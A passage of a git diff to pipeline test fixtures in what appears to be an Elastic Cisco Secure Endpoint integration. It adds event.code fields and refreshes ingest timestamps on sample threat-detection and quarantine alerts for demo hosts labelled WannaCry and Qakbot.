                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7877,8 +7974,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421103055Z",
+                "ingested": "2021-09-30T00:14:44.025485390Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7969,8 +8067,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421104837Z",
+                "ingested": "2021-09-30T00:14:44.025487606Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -8058,8 +8157,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421106624Z",
+                "ingested": "2021-09-30T00:14:44.025489842Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json
similarity index 98%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json
index c0d626f912f..1eb4eaf974b 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json
@@ -51,8 +51,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139816175Z",
+                "ingested": "2021-09-30T00:15:10.798648568Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -128,8 +129,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139820693Z",
+                "ingested": "2021-09-30T00:15:10.798654363Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275390665097000",
@@ -203,8 +205,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139822625Z",
+                "ingested": "2021-09-30T00:15:10.798656876Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275390665097000",
@@ -290,8 +293,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139824393Z",
+                "ingested": "2021-09-30T00:15:10.798659144Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275390665097000",
@@ -388,8 +392,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139826150Z",
+                "ingested": "2021-09-30T00:15:10.798661450Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275390665097000",
@@ -490,8 +495,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139827934Z",
+                "ingested": "2021-09-30T00:15:10.798663701Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275390665097000",
@@ -567,8 +573,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139829673Z",
+                "ingested": "2021-09-30T00:15:10.798665972Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419275390665097000",
@@ -638,8 +645,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139831423Z",
+                "ingested": "2021-09-30T00:15:10.798668225Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6411525251028484000",
@@ -729,8 +737,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139833185Z",
+                "ingested": "2021-09-30T00:15:10.798670499Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6411525251028484000",
@@ -818,8 +827,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139834952Z",
+                "ingested": "2021-09-30T00:15:10.798672750Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6411525251028484000",
@@ -891,8 +901,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139836714Z",
+                "ingested": "2021-09-30T00:15:10.798675025Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 